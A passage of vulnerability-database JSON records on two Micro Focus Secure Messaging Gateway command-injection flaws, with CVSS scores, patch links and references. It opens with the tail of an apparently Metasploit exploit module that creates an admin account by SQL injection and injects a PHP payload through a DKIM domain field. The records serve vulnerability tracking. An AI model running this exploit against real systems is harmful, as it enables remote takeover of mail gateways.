CheckCode::Unknown\n    end\n    unless res.code == 200 \u0026\u0026 res.body.include?(r)\n      return CheckCode::Safe\n    end\n    CheckCode::Vulnerable\n  end\n\n  def implant_payload(cookie)\n    print_status(\u0027Creating a domain record with a malformed DKIM data\u0027)\n    p = [\n      {\n        :id =\u003e \u0027temp_0\u0027,\n        :Description =\u003e rand_text_alpha(5),\n        :DkimList =\u003e [\n          {\n            :Domain =\u003e \"$(php -r \u0027#{payload.encoded}\u0027)\",\n            :Selector =\u003e \u0027\u0027,\n            :TempId =\u003e \u0027tempDkim_1\u0027\n          }\n        ]\n      }\n    ].to_json\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_save_data.json.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027StateData\u0027 =\u003e \u0027[{\"ouid\":1}]\u0027,\n        \u0027SaveData\u0027 =\u003e p\n      }\n    })\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027DbNodeId\u0027)\n      # Defining as global variable since we need to access them later within clean up function. \n      begin\n        @domainid  = res.get_json_document[\u0027Nodes\u0027][0][\u0027DbNodeId\u0027]\n        @dkimid  = res.get_json_document[\u0027Nodes\u0027][1][\u0027DbNodeId\u0027]\n      rescue =\u003e e\n        fail_with Failure::UnexpectedReply, \"Something went horribly wrong while implanting the payload : #{e.message}\"\n      end\n      print_good(\u0027Payload is successfully implanted\u0027)\n    else\n      something_went_wrong\n    end\n  end\n\n  def create_user\n    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection\n    # issue location where requires a valid session !\n    print_status(\u0027Creating a user with appropriate privileges\u0027)\n\n    # Defining as global variable since we need to access them later within clean up function. \n    @username = rand_text_alpha_lower(5..25)\n    @userid = rand_text_numeric(6..8)\n    query = \"INSERT INTO account VALUES (#{@userid}, 1, \u0027#{@username}\u0027, \u00270\u0027, \u0027\u0027, 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)\"\n\n    execute_query(query)\n    res = execute_query(\"SELECT * FROM account WHERE loginname = \u0027#{@username}\u0027\")\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(@username)\n      print_good(\"User successfully created. Username : #{@username}\")\n    else\n      something_went_wrong\n    end\n  end\n\n  def login\n    print_status(\"Authenticating with created user\")\n    res = send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027security\u0027, \u0027securitygate.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027username\u0027 =\u003e @username,\n        \u0027password\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027passwordmandatory\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027LimitInterfaceId\u0027 =\u003e 1\n      }\n    )\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027/ui/default/index.php\u0027)\n      print_good(\u0027Successfully authenticated\u0027)\n      cookie = res.get_cookies\n    else\n      something_went_wrong\n    end\n    cookie\n  end\n\n  def exploit\n    unless check == CheckCode::Vulnerable\n      fail_with Failure::NotVulnerable, \u0027Target is not vulnerable\u0027\n    end\n\n    create_user\n    cookie = login\n    implant_payload(cookie)\n\n    print_status(\u0027Triggering an implanted payload\u0027)\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_dkim_keygen_request.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027DkimRecordId\u0027 =\u003e @dkimid\n      }\n    })\n\n  end\n\n  def on_new_session(session)\n    print_status(\u0027Cleaning up...\u0027)\n    cmd = \"\"\n    cmd \u003c\u003c \u0027PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"\u0027\n    cmd \u003c\u003c \"DELETE FROM account WHERE loginname =\u0027#{@username}\u0027;\"\n    cmd \u003c\u003c \"DELETE FROM UserRole WHERE idaccount = #{@userid};\"\n    cmd \u003c\u003c \"DELETE FROM Domain WHERE iddomain = #{@domainid};\"\n    cmd \u003c\u003c \"DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};\"\n    cmd \u003c\u003c \u0027\"\u0027\n    session.shell_command_token(cmd)\n  end\n\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-12465"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          }
        ],
        "trust": 1.89
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-122427",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=45083",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-12465",
            "trust": 2.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "45083",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-122427",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-12465",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "148758",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-12465"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "id": "VAR-201806-1216",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T22:34:15.342000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Critical Remote Code Execution Vulnerability in SMG (CVE-2018-12465)",
            "trust": 0.8,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
          },
          {
            "title": "Micro Focus Secure Messaging Gateway Web administration Fixes for component operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81643"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-77",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.9,
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "trust": 1.8,
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          },
          {
            "trust": 1.8,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12465"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12465"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/exploit/linux/http/microfocus_secure_messaging_gateway"
          },
          {
            "trust": 0.1,
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12464"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023133\u0027]"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-12465"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-12465"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-06-29T00:00:00",
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "date": "2018-06-29T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-12465"
          },
          {
            "date": "2018-09-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "date": "2018-07-31T14:49:49",
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "date": "2018-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          },
          {
            "date": "2018-06-29T16:29:00.337000",
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-12465"
          },
          {
            "date": "2018-09-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          },
          {
            "date": "2024-11-21T03:45:16.237000",
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Micro Focus Secure Messaging Gateway In  OS Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202008-0084

    Vulnerability from variot - Updated: 2024-11-23 21:59

    DKIM key management page vulnerability on Micro Focus Secure Messaging Gateway (SMG). Affecting all SMG Appliance running releases prior to July 2020. The vulnerability could allow a logged in user with rights to generate DKIM key information to inject system commands into the call to the DKIM system command. (DoS) It may be put into a state. The product supports functions such as email scanning and inbound and outbound protection

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202008-0084",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "secure messaging gateway",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "microfocus",
            "version": "2020-07-01"
          },
          {
            "model": "secure messaging gateway",
            "scope": null,
            "trust": 0.8,
            "vendor": "micro focus",
            "version": null
          },
          {
            "model": "focus secure messaging gateway",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "micro",
            "version": "2020-7"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:microfocus:secure_messaging_gateway",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          }
        ]
      },
      "cve": "CVE-2020-11852",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2020-11852",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-009059",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-50256",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-164472",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-11852",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-009059",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-11852",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-009059",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-50256",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202008-280",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-164472",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "VULHUB",
            "id": "VHN-164472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "DKIM key management page vulnerability on Micro Focus Secure Messaging Gateway (SMG). Affecting all SMG Appliance running releases prior to July 2020. The vulnerability could allow a logged in user with rights to generate DKIM key information to inject system commands into the call to the DKIM system command. (DoS) It may be put into a state. The product supports functions such as email scanning and inbound and outbound protection",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-11852"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "VULHUB",
            "id": "VHN-164472"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-11852",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256",
            "trust": 0.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-164472",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "VULHUB",
            "id": "VHN-164472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "id": "VAR-202008-0084",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "VULHUB",
            "id": "VHN-164472"
          }
        ],
        "trust": 1.45
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:59:07.859000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "7024775",
            "trust": 0.8,
            "url": "https://support.microfocus.com/kb/doc.php?id=7024775"
          },
          {
            "title": "Patch for Micro Focus Secure Messaging Gateway injection vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/232888"
          },
          {
            "title": "Micro Focus Secure Messaging Gateway Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=125965"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-74",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-164472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11852"
          },
          {
            "trust": 1.7,
            "url": "https://support.microfocus.com/kb/doc.php?id=7024775"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11852"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "VULHUB",
            "id": "VHN-164472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "VULHUB",
            "id": "VHN-164472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-09-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "date": "2020-08-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-164472"
          },
          {
            "date": "2020-10-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "date": "2020-08-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          },
          {
            "date": "2020-08-07T16:15:11.700000",
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-09-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "date": "2021-07-21T00:00:00",
            "db": "VULHUB",
            "id": "VHN-164472"
          },
          {
